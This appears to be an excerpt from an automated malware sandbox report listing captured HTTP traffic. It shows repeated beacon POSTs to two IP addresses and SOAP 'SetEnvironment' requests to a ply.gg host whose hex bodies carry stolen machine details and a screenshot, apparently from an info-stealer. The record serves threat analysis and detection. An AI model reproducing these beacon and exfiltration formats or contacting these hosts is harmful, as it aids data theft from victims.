                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 95722Expect: 100-continueAccept-Encoding: gzip, deflate
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 95721Expect: 100-continueAccept-Encoding: gzip, deflate
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 95721Expect: 100-continueAccept-Encoding: gzip, deflateData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 75 73 65 72 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 43 69 74 79 3e 55 4e 4b 4e 4f 57 4e 3c 2f 61 3a 43 69 74 79 3e 3c 61 3a 43 6f 75 6e 74 72 79 3e 55 53 3c 2f 61 3a 43 6f 75 6e 74 72 79 3e 3c 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 31 30 30 30 31 38 37 30 30 31 5c 62 75 69 6c 64 31 32 2e 65 78 65 3c 2f 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 3c 61 3a 48 61 72 64 77 61 72 65 3e 39 46 31 39 36 42 34 39 37 42 44 46 44 30 43 45 44 38 33 32 44 34 41 42 38 41 41 43 33 42 34 46 3c 2f 61 3a 48 61 72 64 77 61 72 65 3e 3c 61 3a 49 50 76 34 3e 38 31 2e 31 38 31 2e 35 37 2e 35 32 3c 2f 61 3a 49 50 76 34 3e 3c 61 3a 4c 61 6e 67 75 61 67 65 3e 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 3c 2f 61 3a 4c 61 6e 67 75 61 67 65 3e 3c 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 61 6c 66 6f 6e 73 3c 2f 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 3c 61 3a 4d 6f 6e 69 74 6f 72 3e 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 42 51 41 41 41 41 51 41 43 41 59 41 41 41 43 2b 6b 2f 52 44 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 41 52 6e 51 55 31 42 41 41 43 78 6a 77 76 38 59 51 55 41 41 41 41 4a 63 45 68 5a 63 77 41 41 44 73 4d 41 41 41 37 44 41 63 64 76 71 47 51 41 41 4b 4e 63 53 55 52 42 56 48 68 65 37 50 31 2f 65 42 7a 33 66 65 42 35 37 68 39 33 74 33 76 6e 5a 35 37 64 6d 39 76 62 33 64 6c 6e 62 37 6d 36 33 5a 32 39 33 4d 37 74 62 76 59 77 73 35 37 6c 2f 76 41 6f 48 74 73 38 61 31 65 30 4d 78 6b 34 6b 59 53 4d 6e 46 43 32 4d 34 77 63 6d 35 62 74 51 46 46 69 4a 4a 62 43 53 4c 49 74 78 54 4b 63 52 4d 4c 45 69 65 69 78 45 6c 69 79 41 74 6b 5a 67 34 6b 74 57 42 61 44 53 45 34 67 55 68 59 6b 57 59 52 2b 67 70 5a 6f 79 42 51 46 6b 52 4c 42 58 2f 70 63 66 61 75 71 67 65 35 47 6f 51 43 51 41 49 6c 75 76 74 37 50 38 35 6f 49 36 4f 37 71 71 75 71 47 35 50 70 4d 56 66 65 2f 46 5a 49 6b 53 5a 49 6b 53 5a 4b 36 4e 67 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 7
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 95722Expect: 100-continueAccept-Encoding: gzip, deflateData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 75 73 65 72 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 43 69 74 79 3e 55 4e 4b 4e 4f 57 4e 3c 2f 61 3a 43 69 74 79 3e 3c 61 3a 43 6f 75 6e 74 72 79 3e 55 53 3c 2f 61 3a 43 6f 75 6e 74 72 79 3e 3c 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 31 30 30 30 31 38 38 30 30 31 5c 62 75 69 6c 64 31 32 2e 65 78 65 3c 2f 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 3c 61 3a 48 61 72 64 77 61 72 65 3e 39 46 31 39 36 42 34 39 37 42 44 46 44 30 43 45 44 38 33 32 44 34 41 42 38 41 41 43 33 42 34 46 3c 2f 61 3a 48 61 72 64 77 61 72 65 3e 3c 61 3a 49 50 76 34 3e 38 31 2e 31 38 31 2e 35 37 2e 35 32 3c 2f 61 3a 49 50 76 34 3e 3c 61 3a 4c 61 6e 67 75 61 67 65 3e 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 3c 2f 61 3a 4c 61 6e 67 75 61 67 65 3e 3c 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 61 6c 66 6f 6e 73 3c 2f 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 3c 61 3a 4d 6f 6e 69 74 6f 72 3e 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 42 51 41 41 41 41 51 41 43 41 59 41 41 41 43 2b 6b 2f 52 44 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 41 52 6e 51 55 31 42 41 41 43 78 6a 77 76 38 59 51 55 41 41 41 41 4a 63 45 68 5a 63 77 41 41 44 73 4d 41 41 41 37 44 41 63 64 76 71 47 51 41 41 4b 4e 63 53 55 52 42 56 48 68 65 37 50 31 2f 65 42 7a 33 66 65 42 35 37 68 39 33 74 33 76 6e 5a 35 37 64 6d 39 76 62 33 64 6c 6e 62 37 6d 36 33 5a 32 39 33 4d 37 74 62 76 59 77 73 35 37 6c 2f 76 41 6f 48 74 73 38 61 31 65 30 4d 78 6b 34 6b 59 53 4d 6e 46 43 32 4d 34 77 63 6d 35 62 74 51 46 46 69 4a 4a 62 43 53 4c 49 74 78 54 4b 63 52 4d 4c 45 69 65 69 78 45 6c 69 79 41 74 6b 5a 67 34 6b 74 57 42 61 44 53 45 34 67 55 68 59 6b 57 59 52 2b 67 70 5a 6f 79 42 51 46 6b 52 4c 42 58 2f 70 63 66 61 75 71 67 65 35 47 6f 51 43 51 41 49 6c 75 76 74 37 50 38 35 6f 49 36 4f 37 71 71 75 71 47 35 50 70 4d 56 66 65 2f 46 5a 49 6b 53 5a 49 6b 53 5a 4b 36 4e 67 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 7
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
